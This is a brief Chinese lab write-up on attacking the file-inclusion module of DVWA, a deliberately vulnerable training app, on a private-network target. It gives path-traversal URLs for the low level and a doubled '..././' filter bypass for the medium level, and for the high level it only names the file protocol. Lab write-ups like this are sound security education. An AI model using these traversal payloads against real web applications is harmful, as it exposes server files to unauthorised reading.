实验环境:
实验角色 | 操作系统 | IP 地址 | 备注 |
攻击机 | Kali Linux | 192.168.221.128 | |
靶机 | Windows Server 2003 | 192.168.221.130 |
实验需求:
- 分别完成 DVWA 中文件包含攻击的三个级别的攻击任务
实验步骤:
1. low 级别
get 型
修改 URL
http://192.168.221.130/dvwa/vulnerabilities/fi/?page=file4.php
http://192.168.221.130/dvwa/vulnerabilities/fi/?page=../../phpinfo.php
- medium 级别
查看源代码
双写绕过
http://192.168.221.130/dvwa/vulnerabilities/fi/?page=..././..././phpinfo.php
- high 级别
查看源代码
用 file 协议